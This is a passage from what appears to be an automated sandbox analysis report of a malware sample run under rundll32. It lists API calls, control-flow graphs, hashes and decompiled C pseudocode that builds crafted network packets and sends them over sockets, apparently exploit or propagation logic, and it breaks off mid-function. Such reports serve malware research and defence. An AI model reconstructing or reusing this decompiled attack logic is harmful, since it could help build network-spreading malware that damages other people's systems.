                                                                                                                                                                • Part of subcall function 04E2A016: CloseHandle.KERNEL32(0000FFFF,?,00000000,00000000,00000000,00000024,Function_00006AA8,00000000,0000FFFF), ref: 04E2A105
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000021), ref: 04E2A2FD
                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 04E2A300
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Heap$AllocHandleProcess$CloseThread$Token$AddressCreateCurrentDuplicateModuleOpenProc
                                                                                                                                                              • String ID: Oet Uet0Xet$WaitForMultipleObjects$kernel32
                                                                                                                                                              • API String ID: 2880803415-1973291610
                                                                                                                                                              • Opcode ID: e1376e26a85f0c48f3d763886806d0982ff38f998afbb0bdc23dfc1b26ead406
                                                                                                                                                              • Instruction ID: e6b30078c5250a4278571ecb751b8c1af2ec162900ba126e60f6a33d2a20e291
                                                                                                                                                              • Opcode Fuzzy Hash: e1376e26a85f0c48f3d763886806d0982ff38f998afbb0bdc23dfc1b26ead406
                                                                                                                                                              • Instruction Fuzzy Hash: 28419072A10226AFEF149FF8DE49BAEB775FB48315F105529E611E7280EB75A900CB10
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 384 4e246c7-4e246f4 GetProcessHeap HeapAlloc 385 4e24aa4 384->385 386 4e246fa-4e24717 call 4e22497 384->386 387 4e24aab-4e24ab2 385->387 389 4e2471c-4e2471e 386->389 390 4e247b1-4e247bd GetProcessHeap HeapFree 389->390 391 4e24724-4e2473f call 4e23449 389->391 390->387 391->390 394 4e24741-4e24743 391->394 395 4e24745-4e24756 call 4e22e12 394->395 396 4e2475a-4e2475c 394->396 395->390 401 4e24758 395->401 398 4e24761-4e24777 call 4e229a2 396->398 404 4e247cb 398->404 405 4e24779-4e24788 call 4e221dc 398->405 403 4e247ce-4e247e7 call 4e2317c 401->403 403->390 410 4e247e9-4e24800 GetProcessHeap HeapAlloc 403->410 404->403 411 4e2478a-4e247a6 Sleep call 4e22191 405->411 412 4e247ae 405->412 410->390 413 4e24802-4e24806 410->413 422 4e247c2-4e247c9 411->422 423 4e247a8-4e247ac 411->423 412->390 415 4e24959-4e2495d 413->415 416 4e2480c-4e2481b GetProcessHeap HeapAlloc 413->416 418 4e249a6-4e249df GetProcessHeap HeapAlloc 415->418 419 4e2495f-4e24964 415->419 420 4e2487e-4e24882 416->420 421 4e2481d-4e2486c call 4e23209 416->421 418->420 425 4e249e5-4e24a3c call 4e233a4 418->425 419->418 424 4e24966-4e249a2 419->424 427 4e24a91-4e24a9f GetProcessHeap HeapFree 420->427 428 4e24888-4e248a4 Sleep GetProcessHeap HeapAlloc 420->428 435 4e24872-4e24878 GetProcessHeap HeapFree 421->435 436 4e2486e 421->436 422->412 423->412 429 4e2475e 423->429 424->418 425->435 438 4e24a42-4e24a49 425->438 427->390 428->427 430 4e248aa-4e24928 call 4e232af GetProcessHeap HeapFree 428->430 429->398 439 4e24a52-4e24a70 call 4e23680 430->439 440 4e2492e-4e2494e 430->440 435->420 436->435 438->439 444 4e24a72-4e24a88 call 4e241e9 439->444 445 4e24a8e 439->445 440->427 441 4e24954-4e24956 440->441 441->415 444->445 448 4e24a8a 444->448 445->427 448->445
                                                                                                                                                              C-Code - Quality: 98%
                                                                                                                                                              			E04E246C7(void* __ecx, intOrPtr _a4, void* _a8, char _a12, signed short* _a16, char _a20) {
                                                                                                                                                              				signed int _v8;
                                                                                                                                                              				void* _v12;
                                                                                                                                                              				intOrPtr _v16;
                                                                                                                                                              				signed int _v20;
                                                                                                                                                              				signed int _v24;
                                                                                                                                                              				void* __edi;
                                                                                                                                                              				void* _t146;
                                                                                                                                                              				intOrPtr _t151;
                                                                                                                                                              				void* _t160;
                                                                                                                                                              				intOrPtr _t172;
                                                                                                                                                              				short _t173;
                                                                                                                                                              				signed short _t174;
                                                                                                                                                              				short _t202;
                                                                                                                                                              				short _t205;
                                                                                                                                                              				short _t218;
                                                                                                                                                              				void* _t228;
                                                                                                                                                              				signed int _t242;
                                                                                                                                                              				void* _t248;
                                                                                                                                                              				void* _t249;
                                                                                                                                                              				void* _t251;
                                                                                                                                                              				void _t252;
                                                                                                                                                              
                                                                                                                                                              				_t228 = __ecx;
                                                                                                                                                              				_v8 = 0xc0c0c0c;
                                                                                                                                                              				_t251 = HeapAlloc(GetProcessHeap(), 8, 0x90);
                                                                                                                                                              				_v12 = _t251;
                                                                                                                                                              				if(_t251 == 0) {
                                                                                                                                                              					_v8 = 0xbadf00d;
                                                                                                                                                              				} else {
                                                                                                                                                              					_t246 = _a16;
                                                                                                                                                              					 *_t251 = 0xf00d;
                                                                                                                                                              					_t146 = E04E22497(_t228, _a4,  &_a12,  *_a16 & 0x0000ffff,  &_v12, _a20); // executed
                                                                                                                                                              					if(_t146 != 0) {
                                                                                                                                                              						_v20 =  *(_a12 + 0x22) & 0x0000ffff;
                                                                                                                                                              						_t151 = E04E23449( &_v12, _a20);
                                                                                                                                                              						_v16 = _t151;
                                                                                                                                                              						if(_t151 != 0xffffffff) {
                                                                                                                                                              							if(_t151 != 0) {
                                                                                                                                                              								_t252 = 0;
                                                                                                                                                              								while(E04E229A2(_a4,  &_a12,  *_t246 & 0x0000ffff,  &_v12) != 0) {
                                                                                                                                                              									if(E04E221DC(_a4,  &_a12, _t246) == 0) {
                                                                                                                                                              										L12:
                                                                                                                                                              										_t251 = _v12;
                                                                                                                                                              									} else {
                                                                                                                                                              										Sleep(0x7d0);
                                                                                                                                                              										if(E04E22191( &_a12, _a4, _a8, _t246) == 0) {
                                                                                                                                                              											_v8 = 0xbadf00d;
                                                                                                                                                              											goto L12;
                                                                                                                                                              										} else {
                                                                                                                                                              											_t252 = _t252 + 1;
                                                                                                                                                              											if(_t252 < 0x10) {
                                                                                                                                                              												_t246 = _a16;
                                                                                                                                                              												continue;
                                                                                                                                                              											} else {
                                                                                                                                                              												goto L12;
                                                                                                                                                              											}
                                                                                                                                                              										}
                                                                                                                                                              									}
                                                                                                                                                              									goto L13;
                                                                                                                                                              								}
                                                                                                                                                              								_t251 = _v12;
                                                                                                                                                              								goto L16;
                                                                                                                                                              							} else {
                                                                                                                                                              								if(E04E22E12(_a4, _a12,  *_t246 & 0x0000ffff) != 0) {
                                                                                                                                                              									L16:
                                                                                                                                                              									_v8 = 0xbadf00d;
                                                                                                                                                              									if(E04E2317C(_t228, _a4,  &_a12,  *_t246 & 0x0000ffff) == 0) {
                                                                                                                                                              										goto L13;
                                                                                                                                                              									} else {
                                                                                                                                                              										_t160 = HeapAlloc(GetProcessHeap(), 8, 0x100);
                                                                                                                                                              										_a8 = _t160;
                                                                                                                                                              										if(_t160 == 0) {
                                                                                                                                                              											goto L13;
                                                                                                                                                              										} else {
                                                                                                                                                              											if(_v16 == 0) {
                                                                                                                                                              												L28:
                                                                                                                                                              												if(_a20 == 5 && 0 ==  *_t251) {
                                                                                                                                                              													 *((short*)(_t251 + 0x6c)) = 0x1010;
                                                                                                                                                              													 *((char*)(_t251 + 0x6e)) = 0x10;
                                                                                                                                                              													 *(_t251 + 0x50) = 0x28e0;
                                                                                                                                                              													 *((short*)(_t251 + 0x52)) = 0x7068;
                                                                                                                                                              													 *((short*)(_t251 + 0x54)) = 0x8078;
                                                                                                                                                              													 *((short*)(_t251 + 0x56)) = 0x9490;
                                                                                                                                                              													 *((char*)(_t251 + 0x58)) = 0xaa;
                                                                                                                                                              													 *(_t251 + 0x59) = 0xb4b8;
                                                                                                                                                              													 *((short*)(_t251 + 0x5c)) = 0xbaa0;
                                                                                                                                                              													 *((short*)(_t251 + 0x66)) = 0x4c40;
                                                                                                                                                              													 *((char*)(_t251 + 0x68)) = 0x68;
                                                                                                                                                              													 *((char*)(_t251 + 0x65)) = 0x10;
                                                                                                                                                              												}
                                                                                                                                                              												_t229 =  *(_t251 + 0x6d) & 0x000000ff;
                                                                                                                                                              												asm("cdq");
                                                                                                                                                              												asm("cdq");
                                                                                                                                                              												_t242 = (( *(_t251 + 0x50) & 0x000000ff) + ( *(_t251 + 0x6d) & 0x000000ff) + 8) % ( *(_t251 + 0x6d) & 0x000000ff) % _t229;
                                                                                                                                                              												 *(_t251 + 0x8a) = _t242;
                                                                                                                                                              												 *((short*)(_t251 + 0x8c)) = _t242 + 0xd08;
                                                                                                                                                              												_t248 = HeapAlloc(GetProcessHeap(), 8, 0x13);
                                                                                                                                                              												if(_t248 == 0) {
                                                                                                                                                              													goto L23;
                                                                                                                                                              												} else {
                                                                                                                                                              													 *((short*)(_t248 + 1)) = 0;
                                                                                                                                                              													 *((short*)(_t248 + 3)) = 1;
                                                                                                                                                              													 *((short*)(_t248 + 5)) = 0;
                                                                                                                                                              													 *((short*)(_t248 + 7)) = 0;
                                                                                                                                                              													 *((short*)(_t248 + 9)) = 0;
                                                                                                                                                              													 *((short*)(_t248 + 0xb)) = 1;
                                                                                                                                                              													_t202 = 0x34;
                                                                                                                                                              													 *((short*)(_t248 + 0xd)) = _t202;
                                                                                                                                                              													 *_t248 = 8;
                                                                                                                                                              													 *((short*)(_t248 + 0xf)) = ( *(_t251 + 0x59) & 0x000000ff) +  *((intOrPtr*)(_t251 + 0x8c));
                                                                                                                                                              													_t205 = 2;
                                                                                                                                                              													 *((short*)(_t248 + 0x11)) = _t205;
                                                                                                                                                              													if(E04E233A4(_t229, _a4, _a12,  *_a16 & 0x0000ffff, _t248, _a8, _t205) == 0) {
                                                                                                                                                              														goto L22;
                                                                                                                                                              													} else {
                                                                                                                                                              														 *(_a12 + 0x22) = _v20;
                                                                                                                                                              														goto L21;
                                                                                                                                                              													}
                                                                                                                                                              													L38:
                                                                                                                                                              													HeapFree(GetProcessHeap(), 8, _a8);
                                                                                                                                                              													goto L13;
                                                                                                                                                              												}
                                                                                                                                                              												goto L41;
                                                                                                                                                              											} else {
                                                                                                                                                              												_t248 = HeapAlloc(GetProcessHeap(), 8, 0x27);
                                                                                                                                                              												if(_t248 != 0) {
                                                                                                                                                              													 *((intOrPtr*)(_t248 + 8)) = 1;
                                                                                                                                                              													 *((intOrPtr*)(_t248 + 0x18)) = 1;
                                                                                                                                                              													 *_t248 = 0x12;
                                                                                                                                                              													 *((intOrPtr*)(_t248 + 4)) = 0;
                                                                                                                                                              													 *((intOrPtr*)(_t248 + 0xc)) = 0;
                                                                                                                                                              													 *((intOrPtr*)(_t248 + 0x10)) = 0;
                                                                                                                                                              													 *((intOrPtr*)(_t248 + 0x14)) = 0;
                                                                                                                                                              													 *((intOrPtr*)(_t248 + 0x1c)) = 0x48;
                                                                                                                                                              													 *((intOrPtr*)(_t248 + 0x20)) = ( *(_t251 + 0x88) & 0x0000ffff) + ( *(_t251 + 0x59) & 0x000000ff);
                                                                                                                                                              													_t218 = 2;
                                                                                                                                                              													 *((short*)(_t248 + 0x25)) = _t218;
                                                                                                                                                              													if(E04E23209( *(_t251 + 0x59) & 0x000000ff, _a4, _a12,  *_a16 & 0x0000ffff, _t248, _a8, _t218) != 0) {
                                                                                                                                                              														L21:
                                                                                                                                                              														_v8 = _v8 & 0x00000000;
                                                                                                                                                              													}
                                                                                                                                                              													L22:
                                                                                                                                                              													HeapFree(GetProcessHeap(), 8, _t248);
                                                                                                                                                              												}
                                                                                                                                                              											}
                                                                                                                                                              											L23:
                                                                                                                                                              											if(_v8 == 0) {
                                                                                                                                                              												Sleep(0x7d0);
                                                                                                                                                              												_t249 = HeapAlloc(GetProcessHeap(), 8, 0x29);
                                                                                                                                                              												if(_t249 != 0) {
                                                                                                                                                              													_t172 = 4;
                                                                                                                                                              													 *((intOrPtr*)(_t249 + 4)) = _t172;
                                                                                                                                                              													 *((intOrPtr*)(_t249 + 0xc)) = _t172;
                                                                                                                                                              													 *((intOrPtr*)(_t249 + 0x14)) = _t172;
                                                                                                                                                              													_t173 = 5;
                                                                                                                                                              													 *((short*)(_t249 + 0x25)) = _t173;
                                                                                                                                                              													_t174 = 7;
                                                                                                                                                              													 *(_t249 + 0x27) = _t174;
                                                                                                                                                              													 *_t249 = 0x13;
                                                                                                                                                              													 *((intOrPtr*)(_t249 + 0x18)) = 0x4c;
                                                                                                                                                              													_t233 = _a8;
                                                                                                                                                              													 *((short*)(_a8 + 3)) =  *_a16;
                                                                                                                                                              													_t245 =  *(_t249 + 0x27) & 0x0000ffff;
                                                                                                                                                              													_v24 = ( *(_a12 + 0x22) & 0x0000ff00) - 0x00000100 & 0x0000ffff;
                                                                                                                                                              													_v8 = E04E232AF(_a4, _a12, ( *(_a12 + 0x22) & 0x0000ff00) - 0x00000100 & 0x0000ffff, _t249, _a8,  *(_t249 + 0x27) & 0x0000ffff);
                                                                                                                                                              													HeapFree(GetProcessHeap(), 8, _t249);
                                                                                                                                                              													_v8 = 0xbadf00d;
                                                                                                                                                              													if(_v8 == 0x10002) {
                                                                                                                                                              														_t253 = _a16;
                                                                                                                                                              														if(E04E23680(_t233, _a4, _a12, _v24,  *_a16 & 0x0000ffff, _v16,  &_v12) != 0 && E04E241E9(_t233, _t245, _a4,  &_a12,  *_t253 & 0x0000ffff,  &_v12) != 0) {
                                                                                                                                                              															_v8 = _v8 & 0x00000000;
                                                                                                                                                              														}
                                                                                                                                                              														_t251 = _v12;
                                                                                                                                                              													} else {
                                                                                                                                                              														if(((0 | _v16 == 0x00000000) & (0 | 1 ==  *_t251) & (0 | _a20 == 0x00000005)) != 0) {
                                                                                                                                                              															 *_t251 = 0;
                                                                                                                                                              															goto L28;
                                                                                                                                                              														}
                                                                                                                                                              													}
                                                                                                                                                              												}
                                                                                                                                                              											}
                                                                                                                                                              											goto L38;
                                                                                                                                                              										}
                                                                                                                                                              									}
                                                                                                                                                              									L41:
                                                                                                                                                              								}
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              					L13:
                                                                                                                                                              					HeapFree(GetProcessHeap(), 8, _t251);
                                                                                                                                                              				}
                                                                                                                                                              				return _v8;
                                                                                                                                                              				goto L41;
                                                                                                                                                              			}
























                                                                                                                                                              0x04e246c7
                                                                                                                                                              0x04e246dd
                                                                                                                                                              0x04e246ed
                                                                                                                                                              0x04e246ef
                                                                                                                                                              0x04e246f4
                                                                                                                                                              0x04e24aa4
                                                                                                                                                              0x04e246fa
                                                                                                                                                              0x04e246fa
                                                                                                                                                              0x04e24702
                                                                                                                                                              0x04e24717
                                                                                                                                                              0x04e2471e
                                                                                                                                                              0x04e24731
                                                                                                                                                              0x04e24734
                                                                                                                                                              0x04e24739
                                                                                                                                                              0x04e2473f
                                                                                                                                                              0x04e24743
                                                                                                                                                              0x04e2475a
                                                                                                                                                              0x04e24761
                                                                                                                                                              0x04e24788
                                                                                                                                                              0x04e247ae
                                                                                                                                                              0x04e247ae
                                                                                                                                                              0x04e2478a
                                                                                                                                                              0x04e2478f
                                                                                                                                                              0x04e247a6
                                                                                                                                                              0x04e247c2
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e247a8
                                                                                                                                                              0x04e247a8
                                                                                                                                                              0x04e247ac
                                                                                                                                                              0x04e2475e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e247ac
                                                                                                                                                              0x04e247a6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e24788
                                                                                                                                                              0x04e247cb
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e24745
                                                                                                                                                              0x04e24756
                                                                                                                                                              0x04e247ce
                                                                                                                                                              0x04e247d9
                                                                                                                                                              0x04e247e7
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e247e9
                                                                                                                                                              0x04e247f9
                                                                                                                                                              0x04e247fb
                                                                                                                                                              0x04e24800
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e24802
                                                                                                                                                              0x04e24806
                                                                                                                                                              0x04e24959
                                                                                                                                                              0x04e2495d
                                                                                                                                                              0x04e24966
                                                                                                                                                              0x04e2496c
                                                                                                                                                              0x04e24970
                                                                                                                                                              0x04e24976
                                                                                                                                                              0x04e2497c
                                                                                                                                                              0x04e24982
                                                                                                                                                              0x04e24988
                                                                                                                                                              0x04e2498c
                                                                                                                                                              0x04e24992
                                                                                                                                                              0x04e24998
                                                                                                                                                              0x04e2499e
                                                                                                                                                              0x04e249a2
                                                                                                                                                              0x04e249a2
                                                                                                                                                              0x04e249a6
                                                                                                                                                              0x04e249b2
                                                                                                                                                              0x04e249bb
                                                                                                                                                              0x04e249bc
                                                                                                                                                              0x04e249be
                                                                                                                                                              0x04e249cb
                                                                                                                                                              0x04e249db
                                                                                                                                                              0x04e249df
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e249e5
                                                                                                                                                              0x04e249e7
                                                                                                                                                              0x04e249ec
                                                                                                                                                              0x04e249f2
                                                                                                                                                              0x04e249f6
                                                                                                                                                              0x04e249fa
                                                                                                                                                              0x04e24a01
                                                                                                                                                              0x04e24a05
                                                                                                                                                              0x04e24a06
                                                                                                                                                              0x04e24a0a
                                                                                                                                                              0x04e24a1a
                                                                                                                                                              0x04e24a1e
                                                                                                                                                              0x04e24a23
                                                                                                                                                              0x04e24a3c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e24a42
                                                                                                                                                              0x04e24a49
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e24a49
                                                                                                                                                              0x04e24a91
                                                                                                                                                              0x04e24a99
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e24a99
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e2480c
                                                                                                                                                              0x04e24815
                                                                                                                                                              0x04e2481b
                                                                                                                                                              0x04e24820
                                                                                                                                                              0x04e24823
                                                                                                                                                              0x04e24826
                                                                                                                                                              0x04e24829
                                                                                                                                                              0x04e2482c
                                                                                                                                                              0x04e2482f
                                                                                                                                                              0x04e24832
                                                                                                                                                              0x04e24835
                                                                                                                                                              0x04e2484b
                                                                                                                                                              0x04e2484e
                                                                                                                                                              0x04e24853
                                                                                                                                                              0x04e2486c
                                                                                                                                                              0x04e2486e
                                                                                                                                                              0x04e2486e
                                                                                                                                                              0x04e2486e
                                                                                                                                                              0x04e24872
                                                                                                                                                              0x04e24878
                                                                                                                                                              0x04e24878
                                                                                                                                                              0x04e2481b
                                                                                                                                                              0x04e2487e
                                                                                                                                                              0x04e24882
                                                                                                                                                              0x04e2488d
                                                                                                                                                              0x04e248a0
                                                                                                                                                              0x04e248a4
                                                                                                                                                              0x04e248ac
                                                                                                                                                              0x04e248af
                                                                                                                                                              0x04e248b2
                                                                                                                                                              0x04e248b5
                                                                                                                                                              0x04e248b8
                                                                                                                                                              0x04e248bb
                                                                                                                                                              0x04e248bf
                                                                                                                                                              0x04e248c0
                                                                                                                                                              0x04e248c7
                                                                                                                                                              0x04e248ca
                                                                                                                                                              0x04e248eb
                                                                                                                                                              0x04e248ee
                                                                                                                                                              0x04e248f2
                                                                                                                                                              0x04e24900
                                                                                                                                                              0x04e2490e
                                                                                                                                                              0x04e24914
                                                                                                                                                              0x04e24921
                                                                                                                                                              0x04e24928
                                                                                                                                                              0x04e24a52
                                                                                                                                                              0x04e24a70
                                                                                                                                                              0x04e24a8a
                                                                                                                                                              0x04e24a8a
                                                                                                                                                              0x04e24a8e
                                                                                                                                                              0x04e2492e
                                                                                                                                                              0x04e2494e
                                                                                                                                                              0x04e24956
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e24956
                                                                                                                                                              0x04e2494e
                                                                                                                                                              0x04e24928
                                                                                                                                                              0x04e248a4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e24882
                                                                                                                                                              0x04e24800
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e247e7
                                                                                                                                                              0x04e24756
                                                                                                                                                              0x04e24743
                                                                                                                                                              0x04e2473f
                                                                                                                                                              0x04e247b1
                                                                                                                                                              0x04e247b7
                                                                                                                                                              0x04e247b7
                                                                                                                                                              0x04e24ab2
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000090,?,?,00000000,00000000,?,00000000,00000000,?), ref: 04E246E4
                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 04E246E7
                                                                                                                                                                • Part of subcall function 04E22497: GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,?,?,?,04E2471C,?,?,?,?,?), ref: 04E224AF
                                                                                                                                                                • Part of subcall function 04E22497: HeapAlloc.KERNEL32(00000000,?,?,?,04E2471C,?,?,?,?,?), ref: 04E224B8
                                                                                                                                                                • Part of subcall function 04E22497: GetProcessHeap.KERNEL32(00000008,00001124,74654F20,?,?,?,04E2471C,?,?,?,?,?), ref: 04E224CD
                                                                                                                                                                • Part of subcall function 04E22497: HeapAlloc.KERNEL32(00000000,?,?,?,04E2471C,?,?,?,?,?), ref: 04E224D0
                                                                                                                                                                • Part of subcall function 04E22497: rand.MSVCRT ref: 04E224E1
                                                                                                                                                                • Part of subcall function 04E22497: htons.WS2_32(00001120), ref: 04E224FF
                                                                                                                                                                • Part of subcall function 04E22497: rand.MSVCRT ref: 04E2255F
                                                                                                                                                                • Part of subcall function 04E22497: GetProcessHeap.KERNEL32(00000008,00000160,?,?,?,04E2471C,?,?,?,?,?), ref: 04E22576
                                                                                                                                                                • Part of subcall function 04E22497: HeapAlloc.KERNEL32(00000000,?,?,?,04E2471C,?,?,?,?,?), ref: 04E2257D
                                                                                                                                                                • Part of subcall function 04E22497: htons.WS2_32(0000015C), ref: 04E2259F
                                                                                                                                                                • Part of subcall function 04E22497: rand.MSVCRT ref: 04E225CD
                                                                                                                                                              • Sleep.KERNEL32(000007D0,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 04E2478F
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,?), ref: 04E247B4
                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 04E247B7
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000100,?,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 04E247F0
                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 04E247F9
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000027), ref: 04E24810
                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 04E24813
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,00000000,00000000,00000002), ref: 04E24875
                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 04E24878
                                                                                                                                                              • Sleep.KERNEL32(000007D0), ref: 04E2488D
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000029), ref: 04E24897
                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 04E2489A
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,00000000,00000000,?), ref: 04E24911
                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 04E24914
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000013), ref: 04E249D2
                                                                                                                                                                • Part of subcall function 04E22E12: GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,?), ref: 04E22E32
                                                                                                                                                                • Part of subcall function 04E22E12: HeapAlloc.KERNEL32(00000000), ref: 04E22E3B
                                                                                                                                                                • Part of subcall function 04E22E12: GetProcessHeap.KERNEL32(00000008,00000048,74654F20), ref: 04E22E4D
                                                                                                                                                                • Part of subcall function 04E22E12: HeapAlloc.KERNEL32(00000000), ref: 04E22E50
                                                                                                                                                                • Part of subcall function 04E22E12: htons.WS2_32(00000044), ref: 04E22E68
                                                                                                                                                                • Part of subcall function 04E22E12: send.WS2_32(0BADF00D,00000000,00000048,00000000), ref: 04E22EF3
                                                                                                                                                                • Part of subcall function 04E22E12: recv.WS2_32(0BADF00D,00000008,0000FFFF,00000000), ref: 04E22F0B
                                                                                                                                                                • Part of subcall function 04E22E12: GetProcessHeap.KERNEL32(00000008,00000000), ref: 04E22F31
                                                                                                                                                                • Part of subcall function 04E22E12: HeapFree.KERNEL32(00000000), ref: 04E22F38
                                                                                                                                                                • Part of subcall function 04E22E12: GetProcessHeap.KERNEL32(00000008,?), ref: 04E22F43
                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 04E249D5
                                                                                                                                                                • Part of subcall function 04E23680: GetProcessHeap.KERNEL32(00000008,00000100,00000000,?,74654F20,?,?,04E24A6E,?,?,?,?,00000000,?), ref: 04E23698
                                                                                                                                                                • Part of subcall function 04E23680: HeapAlloc.KERNEL32(00000000,?,?,04E24A6E,?,?,?,?,00000000,?), ref: 04E236A1
                                                                                                                                                                • Part of subcall function 04E23680: GetProcessHeap.KERNEL32(00000008,00000027,?,?,04E24A6E,?,?,?,?,00000000,?), ref: 04E236B1
                                                                                                                                                                • Part of subcall function 04E23680: HeapAlloc.KERNEL32(00000000,?,?,04E24A6E,?,?,?,?,00000000,?), ref: 04E236B4
                                                                                                                                                                • Part of subcall function 04E23680: GetProcessHeap.KERNEL32(00000008,00000013,?,?,04E24A6E,?,?,?,?,00000000,?), ref: 04E236C7
                                                                                                                                                                • Part of subcall function 04E23680: HeapAlloc.KERNEL32(00000000,?,?,04E24A6E,?,?,?,?,00000000,?), ref: 04E236CA
                                                                                                                                                                • Part of subcall function 04E23680: Sleep.KERNEL32(000007D0,?,?,?,00000000,00000000,?,?,?,04E24A6E,?,?,?,?,00000000,?), ref: 04E237A2
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 04E24A96
                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 04E24A99
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Heap$Process$Alloc$Free$Sleephtonsrand$recvsend
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3041643382-0
                                                                                                                                                              • Opcode ID: 802b22d9ec8d71287982a07adb91aa249b0939852da9ee2e457b7d29debe9295
                                                                                                                                                              • Instruction ID: 7bdc1476110a0a6a9ba1efbc830bfd4e6d5902658ef4a49f18bd64c40d956915
                                                                                                                                                              • Opcode Fuzzy Hash: 802b22d9ec8d71287982a07adb91aa249b0939852da9ee2e457b7d29debe9295
                                                                                                                                                              • Instruction Fuzzy Hash: 41C1DE7150036AFEEB10CFA4CA04BAABBB5FF49308F008419F995DB690E735E950DB60
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 449 4e25337-4e2535f HeapAlloc 451 4e25365-4e2538f rand 449->451 452 4e254fd-4e25504 449->452 453 4e25391-4e25397 451->453 454 4e25398-4e253bf rand socket 451->454 453->454 455 4e253c5-4e25400 htons inet_addr connect 454->455 456 4e254ed-4e254f7 HeapFree 454->456 457 4e25406-4e25416 call 4e21ca3 455->457 458 4e254df 455->458 456->452 463 4e254dc 457->463 464 4e2541c-4e25432 call 4e22191 457->464 459 4e254e6-4e254e7 closesocket 458->459 459->456 463->458 467 4e254c6 464->467 468 4e25438-4e25457 call 4e246c7 call 4e221dc 464->468 470 4e254cd-4e254d2 call 4e21dd1 467->470 475 4e2545c-4e25460 468->475 474 4e254d7-4e254da 470->474 474->459 475->470 476 4e25462-4e2547c call 4e21eb9 475->476 476->470 479 4e2547e-4e25492 call 4e22054 476->479 479->470 482 4e25494-4e254aa call 4e24ab5 479->482 482->470 485 4e254ac-4e254be call 4e2516b 482->485 485->470 488 4e254c0-4e254c4 485->488 488->470
                                                                                                                                                              C-Code - Quality: 58%
                                                                                                                                                              			E04E25337(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                                                              				char _v12;
                                                                                                                                                              				void* _v16;
                                                                                                                                                              				signed int _v20;
                                                                                                                                                              				signed int _v24;
                                                                                                                                                              				intOrPtr _v36;
